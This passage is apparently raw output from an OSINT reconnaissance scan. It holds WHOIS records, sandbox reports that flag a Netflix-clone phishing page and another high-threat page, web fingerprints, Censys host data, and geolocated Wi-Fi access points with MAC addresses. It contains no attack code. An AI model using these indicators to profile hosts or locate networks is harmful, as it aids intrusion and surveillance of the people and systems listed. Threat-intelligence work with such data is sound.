blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Woonkamer extra (Net ID: 00:0C:F6:5C:D4:54) | 50.8897, 6.0563 |
| 2023-05-12 02:50:59 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://asbrii.github.io/Netflixclone', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://asbrii.github.io/netflixclone', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://asbrii.github.io/Netflixclone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_c6c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_c6c_ConnHashTable<3180>_HashTable_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_c6c_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_c6c_IE_EarlyTabStart_0xd60_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_c6c_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_c6c_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3180"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': 
u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"asbrii.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"1_2_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "2_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "4_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "3_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3" and extension "jpg"\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"\n "logo_1_.png" has type "PNG image data 329 
x 88 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "1_2_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "2_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "4_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "3_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003180]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF251D14D70A3CF7CA.TMP" has type "data"- Location: [%TEMP%\\~DF251D14D70A3CF7CA.TMP]- [targetUID: 00000000-00003180]\n "~DF182BBFB15AE7FA7B.TMP" has type "data"- Location: [%TEMP%\\~DF182BBFB15AE7FA7B.TMP]- [targetUID: 00000000-00003180]\n "~DFFF3ED2155B95DC4E.TMP" has type "data"- Location: [%TEMP%\\~DFFF3ED2155B95DC4E.TMP]- [targetUID: 00000000-00003180]\n "~DF695BC770569E5886.TMP" has type "data"- Location: [%TEMP%\\~DF695BC770569E5886.TMP]- [targetUID: 00000000-00003180]\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "gc_1_.css" has type "ASCII 
text"- [targetUID: N/A]\n "RecoveryStore._6181050B-EF98-11ED-B78E-080027114090_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_6181050D-EF98-11ED-B78E-080027114090_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_683852A4-EF98-11ED-B78E-080027114090_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "urlref_httpsasbrii.github.ioNetflixclone" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "WMG50FG8.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WMG50FG8.txt]- [targetUID: 00000000-00003180]\n "7VVH3I4B.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7VVH3I4B.txt]- [targetUID: 00000000-00003180]\n "7OKH26QO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7OKH26QO.txt]- [targetUID: 00000000-00003180]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "C2QFW8PG.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\C2QFW8PG.txt]- [targetUID: 00000000-00003180]\n "0JWEZKR8.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0JWEZKR8.txt]- [targetUID: 00000000-00003180]\n "RP5TI3KC.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RP5TI3KC.txt]- [targetUID: 00000000-00003180]\n "S0QLJ7QP.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\S0QLJ7QP.txt]- [targetUID: 00000000-00003180]\n "Netflixclone_1_.htm" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 
N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://asbrii.github.io/Netflixclone/"\n Pattern match: "https://asbrii.github.io"\n Pattern match: "https://asbrii.github.io/Netflixclone"\n Pattern match: "OqC.jAG/4W^Ah\'AtW5"\n Pattern match: "SUIDmicrosoft.com/9216277184358431032346166895971631032229MUID1037C11BAE9D67762C40D215AFD1661Bmicrosoft.com/1025290433280031110700166895971631032229_EDGE_Vmicrosoft.com/9216290433280031110700166911596631032229SRCHDAF=NOFORMmicrosoft.com/1024332378944031085"\n Pattern match: "SUIDmicrosoft.com/9216277184358431032346166895971631032229MUID1037C11BAE9D67762C40D215AFD1661Bmicrosoft.com/1025290433280031110700166895971631032229SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482"\n Pattern match: "SUIDmicrosoft.com/9216277184358431032346166895971631032229SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743SRCHUSRDOB=20220131mi"\n Pattern match: "9216290433280031110700167224096631032229MUID07FB17B7DC71633514C204B9DD3D6245msn.com/1025290433280031110700167224096631032229"\n Pattern match: "MUIDB1037C11BAE9D67762C40D215AFD1661Bieonline.microsoft.com/9216290433280031110700166895971631032229"\n Pattern match: "isdomainmigratedtruewww.msn.com/1025379775232031068455167224096631032229"\n Pattern match: 
"SUIDMmicrosoft.com/9216277184358431032346166895971631032229*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=202201"\n Pattern match: "SUIDMmicrosoft.com/9216277184358431032346166895971631032229*MUID1037C11BAE9D67762C40D215AFD1661Bmicrosoft.com/1025290433280031110700166895971631032229*_EDGE_V1microsoft.com/9216290433280031110700166911596631032229*SRCHDAF=NOFORMmicrosoft.com/10243323789440"\n Pattern match: "isdomainmigratedtruewww.msn.com/102537977523203106845516722409663103 | 185.199.108.153 |
| 2023-05-12 03:01:33 | Raw Data from RIRs | No | Tool - WhatWeb | 1 | 0 | 2 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://www.ayhu.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'UNITED STATES'], u'module': [u'US']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://www.ayhu.xyz/']}, u'UncommonHeaders': {u'string': [u'report-to,nel,cf-ray,alt-svc']}, u'IP': {u'string': [u'104.21.6.166']}}}, {}] | www.ayhu.xyz |
| 2023-05-12 03:31:32 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 6 | 0 | None | b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com | Domain Name: ECASH-PAY.COM
Registry Domain ID: 2607738264_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-03-27T06:28:15Z
Creation Date: 2021-04-26T06:58:38Z
Registry Expiry Date: 2024-04-26T06:58:38Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: DNS1.REGISTRAR-SERVERS.COM
Name Server: DNS2.REGISTRAR-SERVERS.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Domain name: ecash-pay.com
Registry Domain ID: 2607738264_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-03-27T06:28:15.08Z
Creation Date: 2021-04-26T06:58:38.00Z
Registrar Registration Expiration Date: 2024-04-26T06:58:38.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T10:12:16.55Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:51:56 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 2, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'Curated Live Sessions Preview.htm', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f98_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f98_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_f98_ConnHashTable<3992>_HashTable_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3992"\n "IsoScope_f98_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_f98_IE_EarlyTabStart_0x9a8_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_f98_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3992"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': 
u'"185.199.108.153:80"\n "142.250.191.74:443"\n "185.199.108.153:443"\n "207.58.149.159:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"queryfibre.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ajax.googleapis.com"\n "mastermanpublications.com"\n "query.prod.cms.msn.com"\n "queryfibre.github.io"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df143e17619557ccd4.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet 
explorer\\recovery\\high\\active\\recoverystore.{e0e36bb7-edaf-11ed-be7c-0800275af24e}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df4659a31bf6bffa2f.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{e0e36bb9-edaf-11ed-be7c-0800275af24e}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df143e17619557ccd4.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{e0e36bb7-edaf-11ed-be7c-0800275af24e}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{e0e36bb9-edaf-11ed-be7c-0800275af24e}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df4659a31bf6bffa2f.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: 00000000-00003992]\n "slps_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: 00000000-00003992]\n "jquery.min_1_.js" has type "ASCII text with very long lines"- [targetUID: 00000000-00003992]\n "CabD0C8.tmp" has type "data"- Location: [%TEMP%\\CabD0C8.tmp]- [targetUID: 00000000-00002780]\n "splice_1_.css" has type "assembler source ASCII text 
with very long lines"- [targetUID: 00000000-00003992]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003992]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003992]\n "~DF4D711661B7A04B97.TMP" has type "data"- Location: [%TEMP%\\~DF4D711661B7A04B97.TMP]- [targetUID: 00000000-00003992]\n "~DF4E28665F3A902F14.TMP" has type "data"- Location: [%TEMP%\\~DF4E28665F3A902F14.TMP]- [targetUID: 00000000-00003992]\n "~DF143E17619557CCD4.TMP" has type "data"- Location: [%TEMP%\\~DF143E17619557CCD4.TMP]- [targetUID: 00000000-00003992]\n "~DF4659A31BF6BFFA2F.TMP" has type "data"- Location: [%TEMP%\\~DF4659A31BF6BFFA2F.TMP]- [targetUID: 00000000-00003992]\n "~DF30EEA2AB51846FC9.TMP" has type "data"- Location: [%TEMP%\\~DF30EEA2AB51846FC9.TMP]- [targetUID: 00000000-00003992]\n "_E0E36BB9-EDAF-11ED-BE7C-0800275AF24E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003992]\n "RecoveryStore._E0E36BB7-EDAF-11ED-BE7C-0800275AF24E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003992]\n "_E9939342-EDAF-11ED-BE7C-0800275AF24E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003992]\n "_9005BE62-EDB0-11ED-BE7C-0800275AF24E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003992]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00003992]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00002780]\n "4QKL12T1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4QKL12T1.txt]- [targetUID: 00000000-00003992]\n 
"FDR3QYMD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FDR3QYMD.txt]- [targetUID: 00000000-00003992]\n "6JPHIXX5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6JPHIXX5.txt]- [targetUID: 00000000-00003992]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002780]\n "search_1_.json" has type "JSON data"- [targetUID: 00000000-00003992]\n "splice_1_.htm" has type "HTML document ASCII text with CRLF line terminators"- [targetUID: 00000000-00003992]\n "ZN7JGHLC.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZN7JGHLC.txt]- [targetUID: 00000000-00003992]\n "CAGRGPOL.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CAGRGPOL.txt]- [targetUID: 00000000-00003992]\n "UIT1QO2U.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UIT1QO2U.txt]- [targetUID: 00000000-00003992]\n "W8PZ9GMH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W8PZ9GMH.txt]- [targetUID: 00000000-00003992]\n "CabBAEC.tmp" has type "data"- Location: [%TEMP%\\CabBAEC.tmp]- [targetUID: 00000000-00002780]\n "CabBACB.tmp" has type "data"- Location: [%TEMP%\\CabBACB.tmp]- [targetUID: 00000000-00002780]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002780]\n "urlref_httpqueryfibre.github.iov4splice.css" has type "assembler source ASCII text with very long lines"- [targetUID: 00000000-00003992]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00003992]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00003992]'}, 
{u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': u'HTTPS traffic to "142.250.191.74" on port "443"\n HTTPS traffic to "185.199.108.153" on port "443" | 185.199.108.153 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | #LG@Vo1P*Service& (Net ID: 00:01:36:26:BA:43) | 34.0544, -118.244 |
| 2023-05-12 02:53:56 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 2606:50c0:8001::153 |
| 2023-05-12 03:00:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | sntrup761x25519-sha512@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T01:15:51.449Z", "ip": "207.154.228.169", "labels": ["remote-access"], "location_updated_at": "2023-04-26T16:44:53.689109Z", "autonomous_system_updated_at": "2023-04-26T16:44:53.689174Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:33.692371432Z"}, "www.gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T18:54:15.274018983Z"}, "www.blog.posadisad.com": 